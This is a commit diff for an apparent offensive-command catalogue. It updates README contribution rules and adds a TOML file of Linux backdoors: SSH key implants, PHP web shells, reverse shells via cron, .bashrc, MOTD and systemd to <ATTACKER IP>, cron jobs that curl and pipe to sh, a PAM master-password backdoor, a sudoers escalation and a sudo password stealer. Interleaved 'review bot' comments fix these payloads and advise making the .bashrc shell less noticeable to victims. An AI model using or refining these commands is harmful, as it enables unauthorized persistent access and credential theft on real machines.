Commit

added entry
Nicholas Ferreira committed Oct 24, 2023
1 parent 04f2b1b commit e150eb7
Showing 2 changed files with 135 additions and 8 deletions.
17 changes: 9 additions & 8 deletions README.md
@@ -19,7 +19,7 @@ Each toml file in the entries folder corresponds to an entry on Weaponize.it. Th
title = "Title of the entry"
description = "Brief description of the entry"
tags = ["tag1", "tag2"]
source = "https://example.com/source.html"
source = ["https://example.com/source.html"]

[[data]]
description = "Description about the command below"
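Review bot: the template line changes `source` from a string to an array (`source = ["https://example.com/source.html"]`), but nothing in the hunk says whether a string-valued `source` is still accepted, and rule 3 in the next hunk still reads "make sure the field `source` is composed of valid URLs", which a contributor can satisfy with either form. Suggest stating that `source` must always be an array of URL strings, even for a single source, and checking that any existing entries written with the old string form are migrated or still handled by the loader.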
@@ -33,13 +33,14 @@ command = """echo 'the command itself'"""
3. When adding a source, make sure the field `source` is composed of valid URLs.
4. Keep the `title` and `description` and the toml filename concise for clarity and brevity.
5. The toml filename should have underscores (_) as spaces.
6. Consider existing `tags` when selecting appropriate tags for your submission.
7. Utilize multiple `[[data]]` fields if you have more than one command to share.
8. The `language` field should either be left empty or contain a language supported by [highlight.js](https://highlightjs.org/download).
9. The `command` field is capable of multiline entries for comprehensive detailing.
10. Characters in the `command` field do not require escaping.
11. The contents of the submitted file can be modified before being approved.
12. Check the already existing [entries](/entries) and use them as template if needed.
6. The timestamp at the beginning of the filename is added automatically.
7. Consider existing `tags` when selecting appropriate tags for your submission.
8. Utilize multiple `[[data]]` fields if you have more than one command to share.
9. The `language` field should either be left empty or contain a language supported by [highlight.js](https://highlightjs.org/download).
10. The `command` field is capable of multiline entries for comprehensive detailing.
11. Characters in the `command` field do not require escaping.
12. The contents of the submitted file can be modified before being approved.
13. Check the already existing [entries](/entries) and use them as template if needed.

# Run Weaponize.it locally
```
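Review bot: new rule 11 (old rule 10), "Characters in the `command` field do not require escaping", is wrong for the `"""` basic strings the template uses: in a TOML basic multi-line string a backslash starts an escape sequence, so `\n` becomes a newline, `\"` becomes `"`, and an unlisted sequence such as `\$` is a parse error for a conforming TOML parser. Either switch the template and this rule to literal multi-line strings (`command = '''...'''`), where nothing is escaped, or keep `"""` and tell contributors to double every backslash in their commands. Also, new rule 6 says the timestamp at the start of the filename is added automatically, yet the file added in this same commit is `entries/linux_backdoors.toml` with no timestamp; say where and when the prefix is applied (on approval, by a script, at site build) so contributors know not to add one themselves.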
126 changes: 126 additions & 0 deletions entries/linux_backdoors.toml
@@ -0,0 +1,126 @@
title = "Linux backdoors"
description = "What to do to backdoor a linux machine once you got access to it"
tags = ["linux", "backdoor", "php", "ssh", ]
source = ["https://airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c","http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html","https://tryhackme.com/room/linuxbackdoors", "https://gist.github.com/hoefler02/2ca8166c167f147c8fb076b48eb7cb47", "https://r.0x7359.com/", "https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9", "https://hosakacorp.net/p/systemd-user.html", "https://gist.github.com/ahhh/1d4bf832c5a88cc75adb"]

[[data]]
description = "Add your public SSH key to the compromised user's ~/.ssh/authorized_keys file."
language = "bash"
command = """#On your machine:
ssh-keygen -f ./backdoor
cat backdoor.pub #Copy the public key
#On the compromised machine (substitute <public key>):
echo '<public key>' >> ~/.ssh/authorized_keys
#Connect to the compromised machine with
ssh compromised-user@machine-ip -i backdoor"""

[[data]]
description = """Web PHP backdoor.
Put it on some .php file and run it making a request with the parameter 'x'. Works with both GET and POST (POST is stealthier):"""
language = "php"
command = """<?php shell_exec($_REQUEST['x']);"""

[[data]]
description = "Web PHP backdoor (even stealthier):"
language = "php"
command = """#Run commands with
# curl -H "x:ls -la" example.com/backdoor.php
# curl -H "x:cat /etc/passwd" example.com/backdoor.php
<?php echo shell_exec($_SERVER['HTTP_X']);?>"""

[[data]]
description = "Tiniest PHP backdoor possible:"
language = "php"
command = """#Run commands with example.com/backdoor.php?0=ls -la
<?=`$_GET[0]`?>"""

[[data]]
description = "Crontab backdoor keeping existing crontabs (substitute <ATTACKER IP> and <PORT>):"
language = "bash"
command = """(crontab -l > .tab ; echo "* * * * * 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1"""

[[data]]
description = "Crontab backdoor overwriting existing crontabs:"
language = "bash"
command = """(touch .tab ; echo "* * * * * 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1"""

[[data]]
description = "Example sending bash reverse shell every 5 min:"
language = "bash"
command = """(touch .tab ; echo "*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/<ATTACKER ip>/<PORT> 0>&1'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1"""

[[data]]
description = """Running arbitrary commands every minute with cron via http.
Set up a webserver and create a file named 'run'. Put on it the commands you want to run on the compromised machine."""
language = "bash"
command = """(crontab -l > .tab ; echo "* * * * * 'curl https://<ATTACKER IP>/run | sh'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1"""

[[data]]
description = "Bashrc backdoor. Will run everytime a new terminal session is started:"
language = "bash"
command = """echo 'mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f' >> ~/.bashrc"""

[[data]]
description = "PAM backdoor to log in into any user (root required):"
language = "bash"
command = """#Compilation dependencies: apt install -y autoconf automake autopoint bison bzip2 docbook-xml docbook-xsl flex gettext libaudit-dev libcrack2-dev libdb-dev libfl-dev libselinux1-dev libtool libcrypt-dev libxml2-utils make pkg-config sed w3m xsltproc xz-utils gcc
git clone https://github.com/zephrax/linux-pam-backdoor
#Change 1.4.0 to other existing version if applicable (https://github.com/linux-pam/linux-pam/releases)
./backdoor.sh -v 1.4.0 -p passw0rd
#This will generate a pam_unix.so. Copy it to /lib/x86_64-linux-gnu/security/ on the target machine.
#Now log in into any user using the password 'passw0rd'."""

[[data]]
description = "Add your unprivileged user to sudoers (substitute <USER>) (root required)"
language = "bash"
command = """echo '<USER> ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers"""

[[data]]
description = "Backdooring SSH message of the day. This will be run whenever someone logs in into the server via SSH:"
language = "bash"
command = """echo -e '#!/bin/sh\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f &' > 20-backdoor && chmod +x 20-backdoor"""

[[data]]
description = "Backdooring systemd services. Change <ATTACKER IP> and <ATTACKER PORT> and run this script on the compromised machine. The backdoor will run whenever a user logs in into the server:"
language = "ini"
command = """#!/bin/sh
IP="<ATTACKER IP>"
PORT="<ATTACKER PORT>"
SYSTEMD_PATH="/usr/lib/systemd/user/ $HOME/.local/share/systemd/user/ /etc/systemd/user/ $HOME/.config/systemd/user/ $XDG_RUNTIME_DIR/systemd/user/"
W_PATH=""
UNIT="voodoo.service"
UNIT_CONTENT="[Unit]
Description=Black magic happening, avert your eyes
[Service]
RemainAfterExit=yes
Type=simple
ExecStart=/bin/bash -c \"exec 5<>/dev/tcp/$IP/$PORT; cat <&5 | while read line; do \$line 2>&5 >&5; done\"
[Install]
WantedBy=default.target"
for i in $SYSTEMD_PATH; do
mkdir -p "$i"
if [ -w "$i" ]; then W_PATH="${i%/} $W_PATH"; fi
done
for k in $W_PATH; do
echo "$UNIT_CONTENT" > "$k/$UNIT"
echo "[*] created voodoo in '$k/$UNIT"
done
systemctl --user daemon-reload
systemctl --user restart $UNIT > /dev/null
systemctl --user enable $UNIT"""

[[data]]
description = "Sudo backdoor for stealing passwords. This will mimics the original sudo binary behavior and gets the user's password. After downloading, edit the file and change 'localhost 31337' on the last lines to your ip and port to receive the information. You can also set up a webserver and curl the password to it:"
language = "bash"
command = """#Change /tmp/sudo if needed
wget https://raw.githubusercontent.com/nisay759/sudo-backdoor/master/sudo.sh -O /tmp/sudo
chmod +x /tmp/sudo
echo 'alias sudo="/tmp/sudo"' >> ~/.bashrc"""
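Review bot: the systemd entry (the `[[data]]` block with `language = "ini"`) will keep the whole file from loading: inside its `"""` basic string, `\$line` on the `ExecStart=` line is not a valid TOML escape sequence, so a conforming parser rejects `linux_backdoors.toml`, and even if it were accepted, `\"` would be unescaped to `"` and terminate the script's `UNIT_CONTENT="..."` string early. Switch that `command` to a literal string (`command = '''...'''`) and set `language = "bash"`, since the content is a shell script, not an INI file. Three cron entries are also broken as written: `* * * * * 'rm /tmp/f;mkfifo /tmp/f;...'` (both the keep-existing and overwrite variants) and `* * * * * 'curl https://<ATTACKER IP>/run | sh'` wrap the whole pipeline in single quotes, so the `sh` that cron spawns sees a single word and fails with "command not found"; drop the quotes or use `/bin/sh -c '...'` as the `*/5` bash reverse-shell entry already does. Smaller points: the `.bashrc` entry runs `cat /tmp/f|/bin/sh -i 2>&1|nc ...` in the foreground, so every new interactive shell hangs until the attacker's listener closes, which the victim will notice; background it with `&` the way the MOTD entry does. The MOTD entry writes `20-backdoor` into the current directory and never says where it must go (on Debian-based systems `/etc/update-motd.d/`, which needs root), so the description should give the path. And the sudoers entry appends to `/etc/sudoers` without `visudo -c`; a typo there locks out sudo for everyone, so point contributors at a file in `/etc/sudoers.d/` instead.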
